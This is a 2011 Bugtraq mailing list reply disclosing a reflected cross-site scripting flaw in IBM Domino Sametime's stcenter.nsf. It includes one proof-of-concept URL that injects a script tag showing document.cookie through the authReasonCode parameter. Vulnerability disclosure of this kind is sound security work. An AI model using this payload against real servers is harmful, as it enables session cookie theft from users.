[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Domino Sametime Multiple Reflected Cross-Site Scripting

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Domino Sametime Multiple Reflected Cross-Site Scripting
From: barkley@xxxxxxx
Date: Tue, 22 Feb 2011 06:08:15 -0700

Hi,


I discovered similar XSS affecting Domino Sametime some time ago...

This XSS affects other scripts also... 

i.e. stcenter.nsf

Here's an example:

/stcenter.nsf?OpenDatabase&authReasonCode="><script>alert(document.cookie);</script>"


Cheers

Andrew

Prev by Date: AST-2011-002: Multiple array overflow and crash vulnerabilities in UDPTL code
Next by Date: HTB22845: SQL Injection in cdnvote wordpress plugin
Previous by thread: Domino Sametime Multiple Reflected Cross-Site Scripting
Next by thread: [security bulletin] HPSBUX02628 SSRT090183 rev.1 - HP-UX Running CDE Calendar Manager, Remote Execution of Arbitrary Code
Index(es):
- Date
- Thread